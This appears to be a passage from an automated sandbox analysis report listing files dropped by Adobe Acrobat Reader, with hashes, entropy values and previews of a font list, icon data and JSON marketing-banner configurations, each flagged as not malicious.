                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):243196
                                              Entropy (8bit):3.3450692389394283
                                              Encrypted:false
                                              SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                              MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                              SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                              SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                              SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                              Malicious:false
                                              Reputation:low
                                              Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):295
                                              Entropy (8bit):5.343972621793281
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJM3g98kUwPeUkwRe9:YvXKXi5liZc0vyVOGMbLUkee9
                                              MD5:D005DCDD8ACB3FB479D089C9D0B658EA
                                              SHA1:3245F792A2A8A8FEC220E7587530322F81734443
                                              SHA-256:ACA10123F1CEC785FA324D0BF18520522102FE1652408B881194B676641A4D13
                                              SHA-512:B5B350CBB471BEAFA22A26BD11BAED8BD57A80CCC770096F065030BD885524528549BAA66E58F832BB58E5608B3507DB423B947F5B6718736FCFC70E8C306059
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.291318322728243
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfBoTfXpnrPeUkwRe9:YvXKXi5liZc0vyVOGWTfXcUkee9
                                              MD5:75600291D954822531FDFD904621CB39
                                              SHA1:1B0AEFA2F93DCFA6C62503F90581BCDB6D3EE63F
                                              SHA-256:D58596FA61093E1CDDEB6775870B9120E75B6CF3CB3711567BAFF8272DB85364
                                              SHA-512:8F54F3EC093528197F89D52B01BC20EBEB7934F6B40C3A4FDF276503E660508B115DFB6C562E29E605B5552028E65E05010CEF915B10CE727360D48326A1DA2F
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.26945723747351
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfBD2G6UpnrPeUkwRe9:YvXKXi5liZc0vyVOGR22cUkee9
                                              MD5:127BDB77B7E1AED20124587E5AB87124
                                              SHA1:1304455E25DEDF10515490F305BB3254BB860E12
                                              SHA-256:9B41301D0E2F6B0694010B30D2E469C11B11A7939B299BFE7EF73E3FC08478BA
                                              SHA-512:034DCB1C8C4E2989DCD594980875191E513E87A0CAFD497F0A26CDDAB5CE0C6ABB907DF0720A72851D5BD07C80E413EDAA0A514574E99CC889F2275FF0BEC961
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):285
                                              Entropy (8bit):5.330302750285846
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfPmwrPeUkwRe9:YvXKXi5liZc0vyVOGH56Ukee9
                                              MD5:87EC07CF46347A459E9F91406597E96B
                                              SHA1:4D4C79C22A30ABDE02EB64F65C1ACCAC45BCB7A0
                                              SHA-256:C47A5A75F0FCBDB96B8A2D5888BDCC6082CDEFB39F106EAFA0204BA7E4646B51
                                              SHA-512:A79B25DC2857ED8126F2FD365B16607C413EF9895BB0EDA99DF1F9DB2101224945A21EA09FB35CD85EA8116347EC2A46BAD4680EC0413BBFA290A092B6AFEC29
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1063
                                              Entropy (8bit):5.663899263748864
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5YzvMpLgEFqciGennl0RCmK8czOCY4w2r:Yvjg0hgLtaAh8cvYvg
                                              MD5:098ADA17E0A8E290C7684A957E8C2B7D
                                              SHA1:D1E0C5088D023A00502FF5A6CDD35C518263AC40
                                              SHA-256:D2F693A7FFAF7031116254750FC41C1B638EB4707AD514F903AA2B4B6ED2A607
                                              SHA-512:E9EC74FB0BE66B92D28D3758383691CE2F93FCAE07DC4C52D2140CAFECED748945297A5F8FA86E32BD67BDEBBB4C85F208E5C5807AED1C8FD921C93FD78D1EB0
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1050
                                              Entropy (8bit):5.652818001613488
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5YzvmVLgEF0c7sbnl0RCmK8czOCYHflEpwiVr:YvjguFg6sGAh8cvYHWpwO
                                              MD5:B790BF95C84F6A2FBCDCBC59A1D57785
                                              SHA1:7FDA8B926078DE98C6C5AEFB22E59137F735BCB8
                                              SHA-256:89754E3C9C0B101FE592306F2DAF9A0DF89B626170793C32A2F0495A516346A3
                                              SHA-512:46D7139DF2C01C0D3925309622721D2540F1CE4BA0BF2A5D66C923EC81050E65C025BEDB5D762F0AD589636EF3436AA0D9A1D130FB3302A225912F0A0682E5DC
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.282949224964007
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfQ1rPeUkwRe9:YvXKXi5liZc0vyVOGY16Ukee9
                                              MD5:9E34190805108316F6EA3FCCB5101BE1
                                              SHA1:A34F19B7DA84C88E7874AB67BD9F70F8E4A4DAC4
                                              SHA-256:CE01CDB60AB94C56174C68ABA390D915861F90B18598FB3D549E242A5A08053F
                                              SHA-512:7EFC1B3FD9BA15E08947E00E1DDB2366D05F462508B4905D784F20D350A50A4007D2CF44136FA45ACE32589205275D577080E3AB38AAFDB9FAB5C183F53DF586
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1038
                                              Entropy (8bit):5.646129258727059
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5YzvT2LgEF7cciAXs0nl0RCmK8czOCAPtciBr:Yvjg7ogc8hAh8cvAx
                                              MD5:E7B601154092424161BCDCFBBA6E8776
                                              SHA1:2CB5321197A2AF06429979F25D4424877F954BB4
                                              SHA-256:D7210298E6A92F6A5167626ED01FA8292055D9FF2909659CD99536EAFE28E8D5
                                              SHA-512:E26BBD99E880688CBC24349773C717B915A48BE64182C48DBFB7CA8FFEACAC3F66600E66AF4CFBFDCE680407F945EDC769D4610EC9BF8033215BE6F18CC63E5F
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1164
                                              Entropy (8bit):5.698195459253088
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5YzvfKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5r:Yvjg3EgqprtrS5OZjSlwTmAfSKt
                                              MD5:40761653FEA566B5B4D28986DC1896B8
                                              SHA1:DBEBD20ACD8E902B06350A5075AF4C7B741A29E4
                                              SHA-256:FF0710C86197A33094E27E133BB296776DBFFAF6B8DCBE52C7174191AAD98441
                                              SHA-512:5EF39584E1C1837E3F9900D04A1DAC545844F020354E2950859EE5F8F2B36B0A95AAB6BFCE25A86A12A1F7AEE3BA534B56598A9F47D1567360B19ADEE12680D2
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.285576229090794
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfYdPeUkwRe9:YvXKXi5liZc0vyVOGg8Ukee9
                                              MD5:9938DC3899D2F3B22EAF5BCD88A92ED2
                                              SHA1:AD193C6C3B6B0FA222FE91952BA6B200D94E2D92
                                              SHA-256:4A6CFC088F670C6CBAE807792EA4F3471ADBD33F54F2A78CBA47A1E1926499E0
                                              SHA-512:56CDF4D61A28266834EB799ABC614BA894233857689E7196E927F3390489FD1B072AC4B94110D6E5680D5100DDD2137F9F35725DB4287AA9BB4DA6B2D661E0A6
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1395
                                              Entropy (8bit):5.773939166642354
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5YzvirLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNj:YvjgKHgDv3W2aYQfgB5OUupHrQ9FJt
                                              MD5:E4EBED8FB5C4966CFED6D6253C7BD8A8
                                              SHA1:E2220F1A5CF3D8D5A00E9821793A1577F26F9EB3
                                              SHA-256:1D8E658125B1D286C1765D24351ED91B4B660B886F9240A8099358885D6A9643
                                              SHA-512:8A6936D1A4AB5A09013396FBCC12F132983548CBB08CEF39A533704D88AA5E9A8EB23A44F871106A21F97F8AD9447E4E579189A200872A9806845236C43A5B49
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):291
                                              Entropy (8bit):5.26922245921077
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfbPtdPeUkwRe9:YvXKXi5liZc0vyVOGDV8Ukee9
                                              MD5:180E00B5A89C961363483FA0A61D0784
                                              SHA1:BEFA42DCAC073F5210F657470C30C8B238C06447
                                              SHA-256:E81306D914A0442CF8FD302FCBEB894C837EC65835E4518364DFEEA2797C4456
                                              SHA-512:57DB78042CEE826FE279CDF74C2ECFEDF52F8D8B6DB7DA13ACD399BD63C0E09BD27079476D3505EF416A2886A9608689750F3D0441FD51AE7B2A7C326DBF2B65
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):287
                                              Entropy (8bit):5.273674265317892
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJf21rPeUkwRe9:YvXKXi5liZc0vyVOG+16Ukee9
                                              MD5:6443B2E4DD307C986748144B125A3CDA
                                              SHA1:1D334F11C22B961B86AED96CDE7E8CFB22C6883E
                                              SHA-256:6DE09425EBD88D5EE06604C07A826C7FF76F8A659800D308F042B0CDB7B04D67
                                              SHA-512:43879EF7517B1A6483EB654790FDAFB6D01D1723576528211BC1F3371E7B9162C2ECCB505A17D5E7376CC1FCDB611690A02BDC47D984CFBCC14D93E0FA0BA603
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1058
                                              Entropy (8bit):5.650469225169922
                                              Encrypted:false
                                              SSDEEP:24:Yv6Xi5Yzv4amXayLgEFRcONaqnl0RCmK8czOC+w2E+tg8Br:Yvjg2BguOAh8cv+NKo
                                              MD5:D1C86D6076B5E1BF839A1FF4C6A23769
                                              SHA1:4F722B42AC03302F9C176EB6358C157FF98E190B
                                              SHA-256:8C45D4A88FC80115204CDF724013400072336F06ACBB30EF6ABB2BC56C626549
                                              SHA-512:1E7F117E204E489DA2F1109D481896D0FA1DA27B852DF13248C9A2A4269D0EE5CA4DBFA3ED8978FF21EF32CB86ED815941CB3EBFA9D086B6B887FD6F933F1E78
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):286
                                              Entropy (8bit):5.25155511391052
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXi5MMZHLVoZcg1vRcR0YDVxoAvJfshHHrPeUkwRe9:YvXKXi5liZc0vyVOGUUUkee9
                                              MD5:8D4E2C25EF7C3AF90701E73E195ACDC0
                                              SHA1:F1207CC9EA516135518E82D9839E446DBF592662
                                              SHA-256:7706F3709610CC02F6455A977EB16FCEC71F40C0CE191C336FCBF7F7F066631E
                                              SHA-512:3F616A69D926A4B6C2EDF507768201C33AA917A424AF7FA1C8A8C8A0A7D95D88632B3D66110D3B31A449430C4BF4842EB15877411F1DECCA7621ECE119E15DC3
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):782
                                              Entropy (8bit):5.366211927347141
                                              Encrypted:false
                                              SSDEEP:12:YvXKXi5liZc0vyVOGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWww:Yv6Xi5YzvH168CgEXX5kcIfANhO
                                              MD5:922C0D944BBF977730468A6DCF4C6E27
                                              SHA1:94369886C2E954545F19DBDE325D92B94B619993
                                              SHA-256:F4FE2C21BE0F63C0165D8E0B878522241EA081FFC4D05D17F76654E8BE0593F1
                                              SHA-512:B8DB8E80BACE4F1227E06AD7F730570F160EC51B694DDAF9D359F599AEC58F6D814D149052639C3B3DC84009D2CBEBF9A271ECD9E21F0BD8B353952BF52ADDE4
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"analyticsData":{"responseGUID":"7b06b982-176f-49ce-a7e2-5cab75ff6b5c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1727593790275,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1727417960303}}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4
                                              Entropy (8bit):0.8112781244591328
                                              Encrypted:false
                                              SSDEEP:3:e:e
                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                              Malicious:false
                                              Reputation:low
                                              Preview:....
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):2818
                                              Entropy (8bit):5.1342061063796125
                                              Encrypted:false
